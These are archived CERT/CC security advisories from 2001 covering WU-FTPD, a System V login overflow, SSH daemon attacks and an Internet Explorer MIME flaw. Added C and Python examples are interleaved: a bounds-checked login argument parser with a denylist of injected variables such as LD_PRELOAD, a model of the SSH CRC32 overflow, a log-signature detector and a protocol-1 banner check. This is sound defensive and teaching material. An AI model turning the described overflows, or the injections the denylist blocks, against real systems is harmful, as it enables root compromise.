For additional information about the impacts of each of these vulnerabilities, please consult the CERT Vulnerability Notes Database (http://www.kb.cert.org/vuls).

III. Solution

Apply patches from your vendor

Appendix A contains information for this advisory provided by vendors. As they report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly.

Restrict access to WU-FTPD

As a general practice, the CERT/CC recommends disabling services and access that are not explicitly required. You may wish to disable WU-FTPD until you are able to apply a patch. If you cannot disable the service, you can limit your exposure to these vulnerabilities by blocking or restricting access to the control channel (by default, port 21/tcp) used by WU-FTPD. In the case of the format string vulnerability (VU#639760), the exploit payload is carried in the ident reply, which is transmitted from port 113/tcp on the attacking host to the WU-FTPD server that made the identd request. Note that blocking access from untrusted networks such as the Internet does not protect your systems against attacks from within your network.

Disable anonymous FTP access

Although disabling anonymous FTP access does not prevent attacks from occurring, it does prevent unauthenticated users from attempting to exploit the globbing vulnerability (VU#886083).

Appendix A. Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Note that this advisory discusses two distinct vulnerabilities, and vendor statements may address one or both.
Caldera
  Caldera has released Security Advisory CSSA-2001-041.0:
  http://www.caldera.com/support/security/advisories/CSSA-2001-041.0.txt

Cray
  Cray, Inc. is not vulnerable since the ftp supplied with UNICOS and UNICOS/mk is not based on the Washington University version. Cray did check their ftp code and does not see this exploit.

Debian
  Debian addressed VU#639760 with Debian Security Advisory DSA-016 in January 2001:
  http://www.debian.org/security/2001/dsa-016

Hewlett-Packard Company
  HP's HP-UX is immune to this issue. It was fixed in conjunction with the last "globbing" issue announced in CERT Advisory CA-2001-07, released April 10, 2001. The lab did a complete check/scan of the globbing software, and fixed this issue then as well. Customers should apply the patches listed in HP Security Bulletin #162 released July 19, 2001:
  HPSBUX0107-162 Security Vulnerability in ftpd and ftp
  Hewlett-Packard Security Bulletins are available at the IT Resource Center web site (registration required):
  http://www.itresourcecenter.hp.com/

IBM Corporation
  IBM's AIX operating system does not use WU-FTPD, hence is not vulnerable to the exploit described by CORE ST.

Immunix
  Immunix has released Security Advisory IMNX-2001-70-036-01:
  http://download.immunix.org/ImmunixOS/7.0/updates/IMNX-2001-70-036-01

OpenBSD
  OpenBSD does not use WU-FTPD.

RedHat Inc.
  RedHat has released Errata Advisory RHSA-2001-147:
  http://www.redhat.com/support/errata/RHSA-2001-147.html

SGI
  SGI does not ship IRIX with wu-ftpd, so IRIX is not vulnerable to these issues.

SuSE
  SuSE has released SuSE Security Announcement SuSE-SA:2001:043.

WU-FTPD
  The WU-FTPD Development Group has provided source code patches that address both of these issues.
  * VU#886083:
    ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_current/ftpglob.patch
  * VU#639760:
    ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_current/missing_format_strings.patch

_________________________________________________________________

The CERT Coordination Center thanks CORE Security Technologies and the WU-FTPD Development Group for their help.

_________________________________________________________________

Author: Art Manion

_________________________________________________________________

References

* http://www.kb.cert.org/vuls/id/886083
* http://www.kb.cert.org/vuls/id/639760
* http://www.kb.cert.org/vuls
* http://www.ietf.org/rfc/rfc931.txt
* http://www.ietf.org/rfc/rfc1413.txt
* http://www.ietf.org/rfc/rfc959.txt
* http://www.corest.com/pressroom/advisories_desplegado.php?idxsection=10&idx=172

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2001-33.html

______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2001 Carnegie Mellon University.

Revision History
November 29, 2001: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPAbHnaCVPMXQI2HJAQHA3wQAxL4GR+SowiE0IMczh+V7ENB5n2fo/1Yc
zmI69F4rkOqQQXflsUrVcpPgDkKH2UIrlxREShj/gDqG+gcpyKig2OiqvzlOyb3e
qdDScjFer80EhGlzgTKOoQE0L0RNU5tTD86jfxr8oATY+wjcLYm4Sos+HrnW78CZ
UeM2P0vy/Oo=
=oAMd
-----END PGP SIGNATURE-----

From - Wed Dec 12 17:29:46 2001
Date: Wed, 12 Dec 2001 18:12:58 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-34 Buffer Overflow in System V Derived Login

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2001-34 Buffer Overflow in System V Derived Login

Original release date: December 12, 2001
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* IBM AIX versions 4.3 and 5.1
* Hewlett-Packard's HP-UX
* SCO OpenServer 5.0.6 and earlier
* SGI IRIX 3.x
* Sun Solaris 8 and earlier

Overview

Several applications use login for authentication to the system. A remotely exploitable buffer overflow exists in login derived from System V. Attackers can exploit this vulnerability to gain root access to the server.

I. Description

Several implementations of login that are derived from System V allow a user to specify arguments such as environment variables to the process. An array of buffers is used to store these arguments. A flaw exists in the checking of the number of arguments accepted. This flaw permits the array of buffers to be overflowed.

On most systems, login is not suid; therefore, it runs as the user who called it. If, however, login is called by an application that runs with greater privileges than those of the user, such as telnetd or rlogind, then the user can exploit this vulnerability to gain the privileges of that program. In the case of telnetd or rlogind, root access is gained. Since in.telnetd and in.rlogind are available over the network, a remote attacker without any previous access to the system could use this vulnerability to gain root access to the system.
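A checked argument collector of the kind this bug class calls for, as an added C example that is not any vendor's login source: arguments are copied into a fixed table only while a slot remains for the NULL terminator, and the excess is counted and refused rather than written past the end. The table size, the denylist of variable names and the sample argument vector are this example's assumptions.

```c
/*
 * Added example, not any vendor's login source: a model of the bug class in
 * CA-2001-34. login accepts "NAME=value" arguments and copies them into a
 * fixed array of environment slots; the count check must bound the number
 * of slots written, including the terminating NULL. The table size, the
 * blocked-variable list and the sample argument vector are assumptions.
 */
#include <stdio.h>
#include <string.h>

#define ENV_SLOTS 8   /* hypothetical fixed table size, NULL terminator included */

/* Variables a login program should never let a caller inject (hypothetical
 * denylist, modelled on loader-control and shell-control names). */
static const char *const blocked[] = { "LD_", "PATH=", "IFS=", "SHELL=", "HOME=", NULL };

static int is_blocked(const char *arg)
{
    for (int i = 0; blocked[i]; i++)
        if (strncmp(arg, blocked[i], strlen(blocked[i])) == 0) return 1;
    return 0;
}

/* Checked collector. Accepts at most ENV_SLOTS-1 well-formed, non-blocked
 * arguments so envp always has room for its NULL; returns the number rejected. */
static int collect_env_args(int argc, const char *const argv[], const char *envp[ENV_SLOTS])
{
    int n = 0, rejected = 0;
    for (int i = 0; i < argc; i++) {
        const char *eq = strchr(argv[i], '=');
        int malformed = (eq == NULL || eq == argv[i]);
        if (malformed || is_blocked(argv[i]) || n >= ENV_SLOTS - 1) { rejected++; continue; }
        envp[n++] = argv[i];
    }
    envp[n] = NULL;
    return rejected;
}

/* The unchecked shape this replaces: the loop copies every argument and then
 * writes the NULL at envp[argc], so ENV_SLOTS or more arguments run off
 * the end of the table. */
static int slots_written_unchecked(int argc) { return argc + 1; }

/* Constructed sample: 11 arguments, more than the table can hold. */
static const char *const sample_args[] = {
    "TERM=vt100", "LANG=C", "LD_PRELOAD=/tmp/x.so", "BOGUS",
    "A=1", "B=2", "C=3", "D=4", "E=5", "F=6", "G=7"
};
#define SAMPLE_ARGC (int)(sizeof sample_args / sizeof sample_args[0])

static int sample_rejected(void)
{
    const char *envp[ENV_SLOTS];
    return collect_env_args(SAMPLE_ARGC, sample_args, envp);
}

static int sample_accepted(void)
{
    const char *envp[ENV_SLOTS];
    int n = 0;
    collect_env_args(SAMPLE_ARGC, sample_args, envp);
    while (envp[n]) n++;          /* the terminator is always inside the table */
    return n;
}

int main(void)
{
    const char *envp[ENV_SLOTS];
    int rejected = collect_env_args(SAMPLE_ARGC, sample_args, envp);
    printf("unchecked copy would write %d slots into a table of %d\n",
           slots_written_unchecked(SAMPLE_ARGC), ENV_SLOTS);
    for (int i = 0; envp[i]; i++) printf("env[%d] = %s\n", i, envp[i]);
    printf("rejected %d argument(s)\n", rejected);
    return 0;
}
```

The check that matters is "n >= ENV_SLOTS - 1", not "argc > ENV_SLOTS": the bound has to be applied to the slot index at write time and has to reserve the terminator, otherwise a caller such as telnetd that passes the client's environment straight through decides how many slots get written.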
If a program that invokes login is suid (or sgid) USER_A, then this can be exploited to gain the privileges of USER_A.

An exploit exists and may be circulating.

II. Impact

This vulnerability can be remotely exploited to gain the privileges of the invoker of login. In the case of a program such as telnetd, rlogind, or other suid root programs, root access is gained.

III. Solution

Apply a patch from your vendor

Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please review VU#569272 for your vendor's status or contact your vendor directly.

Restrict access to login

We recommend disabling TELNET, RLOGIN and other programs that use login for authentication. Do not use programs that use a vulnerable login for authentication. Note that some SSH applications can be configured to use login for authentication (for example, OpenSSH's UseLogin option in sshd_config). If this configuration is selected, then you will still be vulnerable. If you cannot disable the service, you can limit your exposure to these vulnerabilities by using a router or firewall to restrict access to port 23/TCP (telnet) and port 513/TCP (rlogin). Note that this does not protect you against attackers from within your network.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Apple Computer, Inc.
  Mac OS X and Mac OS X Server are not vulnerable.

Caldera
  We are not using a System V based /bin/login, we are using the BSD originated rlogin tools. All OpenLinux products are 'Not Vulnerable'.

Compaq Computer Corporation
  Compaq's Tru64 Software is not impacted by this reported problem.
Cray Inc.
  Cray Inc. has determined that its implementation of login is not vulnerable to the situation described in VU#569272.

Hewlett-Packard
  HP-UX is NOT Exploitable, even though HP-UX does have the buffer overflow, and hence is listed as "affected" above. In any case, the buffer overflow has been fixed by HP.

IBM
  IBM's AIX operating system, versions 4.3 and 5.1, is susceptible to this vulnerability. We have prepared an emergency fix ("efix"), "tsmlogin_efix.tar.Z", and it is available for downloading from:
  ftp://aix.software.ibm.com/aix/efixes/security
  The APAR assignment for AIX 5.1 is IY26221, and will be available soon. The APAR for AIX 4.3 is pending, as a new level of 4.3 is nearly available. The "README" file at the above FTP site will be updated to provide the official fix information and availability.

NetBSD
  NetBSD does not use a System V derived login, and therefore, NetBSD is not vulnerable.

Red Hat
  Red Hat Linux does not use a System V derived /bin/login, and is therefore not vulnerable to this.

Sun Microsystems
  Sun has developed a fix and T-patches are being tested. Official patches will be released shortly and Sun will issue a Sun Security Bulletin when they are available.

_________________________________________________________________

The CERT Coordination Center thanks Internet Security Systems and Sun Microsystems for the technical information they provided.

_________________________________________________________________

Feedback on this document can be directed to the author, Jason A. Rafail.

_________________________________________________________________

References

* http://www.kb.cert.org/vuls/id/569272
* http://www.kb.cert.org/vuls

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2001-34.html

______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2001 Carnegie Mellon University.

Revision History
December 12, 2001: Initial Release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPBfg3qCVPMXQI2HJAQE8swP/SGmx37pJWLq9fWhwx/xzu/DSwf8AnjjP
jYbOqE+Iy17YOlI38q1MMh3ifgWoQSW6EeCWlt+Wu6R19APdfbuIbEv+/1iDP+6/
VZK+nnjs4F/i7rWcW0vH8jojFrNkXpAfuZIMEkvzcS/EkrgCisIiB3x9t75CQT+6
V7+HUmMS7+0=
=aq9W
-----END PGP SIGNATURE-----

From - Thu Dec 13 15:12:18 2001
Date: Thu, 13 Dec 2001 14:33:31 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-35 Recent Activity Against Secure Shell Daemons

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2001-35 Recent Activity Against Secure Shell Daemons

Original release date: December 13, 2001
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

Systems running implementations of the Secure Shell (SSH) protocol

Overview

There are multiple vulnerabilities in several implementations of the Secure Shell (SSH) protocol. The SSH protocol enables a secure communications channel from a client to a server. We are seeing a high amount of scanning for SSH daemons, and we are receiving reports of exploitation. System administrators should review their configurations to ensure that they have applied all relevant patches prior to the holiday break.

I. Description

There are multiple vulnerabilities in several implementations of the Secure Shell (SSH) protocol. While these problems have been previously disclosed, we believe many system and network administrators may have overlooked one or more of these vulnerabilities. We are issuing this document primarily to encourage system and network administrators to check their systems, prior to the holiday break, for exposure to each of these vulnerabilities. The CERT/CC is still seeing active scanning and exploitation of vulnerabilities related to SSH.

We also believe that it is important for system administrators to realize that several implementations of SSH version 2 will fall back to their implementation of SSH version 1 if it is present and requested by the client.
Therefore, upgrading to SSH version 2 is not necessarily a sufficient means to patch vulnerabilities that are present in the SSH version 1 implementation; the version 1 protocol also has to be disabled in the server configuration (in OpenSSH, the sshd_config directive "Protocol 2") or the version 1 code removed.

The following vulnerability note and incident note describe activity regarding the SSH CRC32 attack detection code integer overflow vulnerability.

VU#945216 - SSH CRC32 attack detection code contains remote integer overflow

There is a remote integer overflow vulnerability in several implementations of the SSH1 protocol. This vulnerability is located in a segment of code that was introduced to defend against exploitation of CRC32 weaknesses in the SSH1 protocol (see VU#13877). The attack detection function (detect_attack, located in deattack.c) makes use of a dynamically allocated hash table to store connection information that is then examined to detect and respond to CRC32 attacks. By sending a crafted SSH1 packet to an affected host, an attacker can cause the SSH daemon to create a hash table with a size of zero. When the detection function then attempts to hash values into the null-sized hash table, these values can be used to modify the return address of the function call, thus causing the program to execute arbitrary code with the privileges of the SSH daemon, typically root.

IN-2001-12 - Exploitation of vulnerability in SSH1 CRC-32 compensation attack detector

In reports received by the CERT/CC, systems compromised via this vulnerability have exhibited the following pattern in system log messages:

  hostname sshd[xxx]: Disconnecting: Corrupted check bytes on input.
  hostname sshd[xxx]: Disconnecting: crc32 compensation attack: network attack detected
  hostname sshd[xxx]: Disconnecting: crc32 compensation attack: network attack detected
  ..

Some exploits for this vulnerability appear to use a brute force method, so many messages of this type may be logged before a system is successfully compromised.
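Two added C illustrations, neither taken from OpenSSH or ssh-1.2.x source, serving the vulnerability note and the incident note above: a model of the table-sizing arithmetic VU#945216 describes, in which a 32-bit entry count stored in a 16-bit variable yields a zero-entry table whose index mask still spans 65536 entries, beside the widened and bounds-checked version; and a counter for the IN-2001-12 log signature that flags the many-attempts pattern. The constants, the packet ceiling, the threshold and the sample log lines are assumptions of the example.

```c
/*
 * Added example, not OpenSSH or ssh-1.2.x source: a model of the sizing
 * arithmetic behind VU#945216, plus a detector for the IN-2001-12 log
 * signature. A table size derived from the packet length ends up in a
 * 16-bit counter, so one packet length yields a zero-entry table whose
 * index mask still spans 65536 entries. Constants and the sample log
 * lines are this example's assumptions.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HASH_MINSIZE    8192                /* assumed initial table bytes */
#define HASH_ENTRYSIZE  2                   /* 16-bit entries */
#define SSH_BLOCKSIZE   8
#define HASH_FACTOR(x)  ((x) * 3 / 2)
#define SSH1_MAX_PACKET (256u * 1024u)      /* assumed ceiling for a sane packet */

/* Vulnerable shape: the entry count is kept in a 16-bit variable. */
static uint16_t crc32_table_entries_vuln(uint32_t len)
{
    uint16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
    uint32_t l;
    for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l <<= 2)
        ;
    n = (uint16_t)l;              /* 0x10000 silently becomes 0 */
    return n;
}

/* Index mask the detector applies to each hashed value; with n == 0 it is
 * 0xffff, so every write lands somewhere in 128 KiB past a 0-byte table. */
static uint16_t crc32_index_mask(uint16_t n) { return (uint16_t)(n - 1); }

/* Fixed shape: 32-bit count, and oversized packets are refused outright.
 * Returns the entry count, or -1 when the packet must be dropped. */
static long long crc32_table_entries_fixed(uint32_t len)
{
    uint32_t n = HASH_MINSIZE / HASH_ENTRYSIZE, l;
    if (len > SSH1_MAX_PACKET) return -1;
    for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l <<= 2)
        ;
    return (long long)l;
}

/* IN-2001-12: the message the attack detector logs while being exploited. */
static const char crc32_sig[] = "crc32 compensation attack: network attack detected";

/* Count signature lines in a syslog excerpt; *brute_force is set when the
 * count reaches threshold, the pattern the advisory associates with
 * exploit tools that retry many times. */
static int count_crc32_attack_lines(const char *log, int threshold, int *brute_force)
{
    int count = 0;
    for (const char *p = strstr(log, crc32_sig); p; p = strstr(p + 1, crc32_sig))
        count++;
    *brute_force = (count >= threshold);
    return count;
}

static int sample_signature_count(const char *log)
{
    int bf;
    return count_crc32_attack_lines(log, 1, &bf);
}

static int sample_brute_force(const char *log, int threshold)
{
    int bf;
    count_crc32_attack_lines(log, threshold, &bf);
    return bf;
}

/* Constructed sample log; host, pids and addresses are made up. */
static const char sample_log[] =
    "Dec 13 03:10:01 hostname sshd[4412]: Disconnecting: Corrupted check bytes on input.\n"
    "Dec 13 03:10:02 hostname sshd[4413]: Disconnecting: crc32 compensation attack: network attack detected\n"
    "Dec 13 03:10:02 hostname sshd[4414]: Disconnecting: crc32 compensation attack: network attack detected\n"
    "Dec 13 03:10:03 hostname sshd[4415]: Disconnecting: crc32 compensation attack: network attack detected\n"
    "Dec 13 03:10:09 hostname sshd[4416]: Accepted password for alice from 192.0.2.7 port 40122\n";

int main(void)
{
    uint32_t lens[] = { 1024, 88000 };
    for (int i = 0; i < 2; i++)
        printf("len=%lu vuln n=%u mask=0x%04x fixed n=%lld\n", (unsigned long)lens[i],
               (unsigned)crc32_table_entries_vuln(lens[i]),
               (unsigned)crc32_index_mask(crc32_table_entries_vuln(lens[i])),
               crc32_table_entries_fixed(lens[i]));
    int bf;
    int c = count_crc32_attack_lines(sample_log, 3, &bf);
    printf("%d signature line(s), brute force=%d\n", c, bf);
    return 0;
}
```

A packet of about 88000 bytes drives the 32-bit loop variable to 0x10000, which the 16-bit store turns into 0; the same length is ordinary for the 32-bit version. Alerting on a burst of "network attack detected" lines from one source is the cheap detection, because the exploit has to hit the detector repeatedly before it lands.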
The following artifacts have been discovered on systems that were successfully compromised:

* Installation of rootkits that modify standard system utilities to hide the intruder's actions
* Installation of Trojan horse versions of the SSH software, compiled from the latest OpenSSH source code plus intruder-supplied modifications
* Installation of tools to scan large network blocks for other systems that are vulnerable to compromise. Log files left behind from these tools indicate that they operate by looking for the banner displayed upon connection to the sshd service.

For a list of vulnerability notes related to SSH vulnerabilities, please see the References section.

II. Impact

The CRC32 attack detection code integer overflow vulnerability, as well as some of the vulnerabilities listed in the References section, can be exploited remotely. In some cases, they allow an intruder to execute arbitrary code with the privileges of the SSH application daemon, usually root. In some cases, an intruder must be an authorized user of the system. For specific information about the impacts of each of these vulnerabilities, please consult the CERT Vulnerability Notes Database (http://www.kb.cert.org/vuls).

III. Solution

Update to the latest version

If possible, update your implementation of SSH to the latest release. If you are unable to update to the latest version, apply all relevant patches to your current version. It is also recommended that you look at the security or support section on each vendor's site.

Note that it is important for system administrators to realize that several implementations of SSH version 2 will use their implementation of SSH version 1 if it is present and requested by the client. Therefore, upgrading to SSH version 2 is not necessarily a sufficient means to patch vulnerabilities that are present in the SSH version 1 implementation.

Current versions for Data Fellows (F-Secure) can be found at http://www.f-secure.com/products/ssh/.
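The scanning tools the advisory describes work from the banner sshd sends on connection, and the same banner tells an administrator whether a server will still negotiate protocol 1, which is the point the advisory makes about SSH version 2 installations that keep a version 1 implementation. The following is an added example, not code from the advisory or from any SSH vendor; the host names and banners in the inventory are constructed, and it relies only on the documented convention that a server advertising protocol version "1.99" speaks both protocol 1 and 2.

```python
import re

# Constructed sample inventory: host -> identification string the server
# sends at the start of the SSH version exchange. No real hosts.
SAMPLE_BANNERS = {
    "gw.example.net": "SSH-1.99-OpenSSH_2.9p2",
    "db1.example.net": "SSH-2.0-OpenSSH_3.0.2p1",
    "old.example.net": "SSH-1.5-1.2.27",
    "printer.example.net": "220 ftp ready",   # not an SSH banner at all
}

BANNER = re.compile(r"^SSH-(?P<proto>\d+\.\d+)-(?P<software>\S+)(?: (?P<comment>.*))?$")


def assess_banner(banner):
    """Classify which protocol versions a server offers from its banner.

    Protocol version "1.99" is how a server announces that it accepts both
    protocol 1 and protocol 2 clients. That is exactly the configuration
    the advisory warns about: a client may still request protocol 1, so
    version 1 vulnerabilities remain reachable.
    """
    m = BANNER.match(banner.strip())
    if not m:
        return None
    proto = m.group("proto")
    return {
        "software": m.group("software"),
        "protocol": proto,
        "offers_v1": proto.startswith("1."),   # 1.3, 1.5 and 1.99 all accept v1 clients
        "offers_v2": proto in ("1.99", "2.0"),
    }


def hosts_still_offering_v1(banners):
    """Return (host, software, protocol) for servers that still negotiate
    protocol 1, sorted by host, so they can be upgraded or reconfigured."""
    found = []
    for host, banner in banners.items():
        info = assess_banner(banner)
        if info and info["offers_v1"]:
            found.append((host, info["software"], info["protocol"]))
    return sorted(found)


if __name__ == "__main__":
    for host, software, proto in hosts_still_offering_v1(SAMPLE_BANNERS):
        print(f"{host}: {software} advertises protocol {proto}, v1 still reachable")
```

The check says nothing about whether a particular software version is patched; it only separates servers that have actually retired protocol 1 from those that merely added protocol 2 alongside it, which is the distinction the advisory asks administrators to make.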
Current versions for SSH Communications Security can be found at http://www.ssh.com/products/ssh/download.cfm.

Current versions for OpenSSH can be found at http://www.openssh.com.

Please visit your vendor's web site for the latest version.

Apply a patch from your vendor

Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments for the advisory. Please review the CERT Vulnerability Notes Database (http://www.kb.cert.org/vuls) or contact your vendor directly.

Restrict access to the SSH service

As a general practice, we recommend disabling all services that are not explicitly required. You may wish to disable the SSH access if there is not a patch available from your vendor. If you cannot disable the service, you can limit your exposure to these vulnerabilities by using a router or firewall to restrict access to port 22/TCP (SSH). Use tcp wrappers or a program that provides similar functionality, or use the key-based IP restriction offered by your implementation. Note that this does not protect you against attackers from within your network.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments for the advisory. Please review the CERT Vulnerability Notes Database (http://www.kb.cert.org/vuls) or contact your vendor directly.

Berkeley Software Design, Inc. (BSDI)

The current 3.0.2p1 version of OpenSSH is available for BSD/OS version 4.2 in patch M420-018 and for BSD/OS 4.3 in patch M430-001.
Patches are available via ftp from ftp://ftp.bsdi.com/bsdi/patches or via our web site at http://www.bsdi.com/support.

Fujitsu

Fujitsu's UXP/V operating system is not affected by the SSH security vulnerabilities because it does not support the SSH package.

Hewlett-Packard Company

This issue does not apply to HP-UX. HP does not ship SSH.

IBM Corporation

IBM's AIX operating system does not ship with OpenSSH; however, OpenSSH is available for installation on AIX via the Linux Affinity Toolkit. The version included on the CD containing the Toolkit is vulnerable to the latest discovered vulnerability discussed here, VU#157447, as was the version of OpenSSH available for downloading from the IBM Linux Affinity website. We have updated this version on the website to one that is not vulnerable to this security exposure. This version also fixes the other vulnerabilities described in this advisory. Customers can download this version by going to:

http://www6.software.ibm.com/dl/aixtbx/aixtbx-p

This site contains Linux Affinity applications containing cryptographic algorithms, and new users of this site are asked to register first.

NetBSD

The CRC32 attack vulnerability was patched in NetBSD-current on October 30, 2000. NetBSD 1.5 and later already include the patch. Users maintaining earlier revisions of NetBSD should update their systems using the security/openssh package from NetBSD pkgsrc if they have not already done so. Up to date NetBSD security information on SSH, and other vulnerabilities is available from http://www.netbsd.org/Security/

Sun Microsystems

Sun does not ship the Secure Shell (SSH), thus Solaris is not affected by this issue.

_________________________________________________________________

The CERT Coordination Center thanks Markus Friedl of OpenSSH for the technical assistance he provided.

_________________________________________________________________

Feedback on this document can be directed to the authors, Jason A. Rafail and Chad Dougherty

_________________________________________________________________

References

ID          Date Public   Name
VU#19124    01/20/98      SSH authentication agent follows symlinks via a UNIX domain socket
VU#13877    06/11/98      Weak CRC allows packet injection into SSH sessions encrypted with block ciphers
VU#40327    06/09/2000    OpenSSH UseLogin option allows remote execution of commands as root
VU#363181   12/07/2000    OpenSSH disregards client configuration and allows server access to ssh-agent and/or X11 after session negotiation
VU#850440   01/16/2001    SSH1 may generate weak passphrase when using Secure RPC
VU#684820   01/18/2001    SSH-1 allows client authentication to be forwarded by a malicious server to another server
VU#565052   01/18/2001    Passwords sent via SSH encrypted with RC4 can be easily cracked
VU#786900   01/18/2001    SSH host key authentication can be bypassed when DNS is used to resolve localhost
VU#25309    01/18/2001    Weak CRC allows RC4 encrypted SSH1 packets to be modified without notice
VU#118892   01/18/2001    Older SSH clients do not allow users to disable X11 forwarding
VU#665372   01/18/2001    SSH connections using RC4 and password authentication can be replayed
VU#315308   01/18/2001    Weak CRC allows last block of IDEA-encrypted SSH packet to be changed without notice
VU#945216   02/08/2001    SSH CRC32 attack detection code contains remote integer overflow
VU#596827   03/19/2001    Weaknesses in the SSH protocol simplify brute-force attacks against passwords typed in an existing SSH session
VU#655259   06/12/2001    OpenSSH allows arbitrary file deletion via symlink redirection of temporary file
VU#737451   07/20/2001    SSH Secure Shell sshd2 does not adequately authenticate logins to accounts with encrypted password fields containing two or fewer characters
VU#279763   11/19/2001    RhinoSoft Serv-U remote administration client transmits password in plaintext
VU#157447   12/04/2001    OpenSSH UseLogin directive permits privilege escalation
______________________________________________________________________

This document is available from: http://www.cert.org/advisories/CA-2001-35.html

______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.

_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2001 Carnegie Mellon University.

Revision History

December 13, 2001: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPBj+TqCVPMXQI2HJAQGKugP9E50mOcpH0e83E5O2iblG69TRcrlHrtd8
R2lsxc/DMr9Yeh4/+WUG020wSsOBFD1EiCnnW4L8YOowkRQgaYu2xyFh33N3cPXY
0c24NL13UlMydkBb3fLkSSKDmhurzK+ewuFif3fCREReuQrFVaVdYRWSgzG3l4wq
r9w81K9rgbY=
=8koV
-----END PGP SIGNATURE-----

From - Wed Dec 19 17:11:05 2001
Date: Wed, 19 Dec 2001 18:07:43 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Post: NO (posting not allowed on this list)
Subject: CERT Advisory CA-2001-36 Microsoft Internet Explorer Does Not Respect Content-Disposition and Content-Type MIME Headers

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2001-36 Microsoft Internet Explorer Does Not Respect Content-Disposition and Content-Type MIME Headers

Original release date: December 19, 2001
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Microsoft Internet Explorer 6.0 for Windows
* Microsoft Outlook, Outlook Express, or any other software that utilizes vulnerable versions of Internet Explorer to render HTML

Overview

Microsoft Internet Explorer contains a vulnerability in its handling of certain MIME headers in web pages and HTML email messages. This vulnerability may allow an attacker to execute arbitrary code on the victim's system when the victim visits a web page or views an HTML email message.

I. Description

Web pages and HTML email messages usually contain HTML text, but other files may also be included. The MIME headers Content-Disposition and Content-Type provide the information needed by the HTML rendering software to determine the type of these files. In Microsoft Internet Explorer, these MIME headers are consulted when evaluating whether to process an embedded file, but they are ignored when the file is actually processed. For example, if an executable (.exe) file is embedded with MIME headers that misrepresent it as a JPEG image file (.jpg), Internet Explorer will treat the file as a JPEG when evaluating whether it is safe to open. Once this evaluation is complete, the file will be opened according to its .exe file extension and will be executed on the local system. This behavior results in a vulnerability that allows attackers to bypass the security measures that typically screen out executable code. This code would be executed with the privileges of the user who views the web page or email message.

Users who view a malicious web site or HTML email message may be able to prevent the execution of the attacker's code by using the download progress dialog box to cancel the download. However, depending on the size of the embedded file and the speed of the network connection, users may not have time to cancel the file download.

The CERT/CC is tracking this vulnerability as VU#443699, which corresponds directly to the "File Execution" vulnerability described in Microsoft Security Bulletin MS01-058. This Microsoft bulletin is available at

http://www.microsoft.com/technet/security/bulletin/MS01-058.asp

This vulnerability is being referenced in CVE as CAN-2001-0727.

II. Impact

By convincing a user to view a malicious web page or HTML email message, a remote attacker can cause the user to execute arbitrary code. Any such code would run with the privileges of the user who attempted to view the content.

III. Solution

Apply a patch from your vendor

Microsoft has released a cumulative patch for Internet Explorer that corrects this vulnerability and several others. For more information about the patch and the vulnerabilities, please see Microsoft Security Bulletin MS01-058:

http://www.microsoft.com/technet/security/bulletin/MS01-058.asp

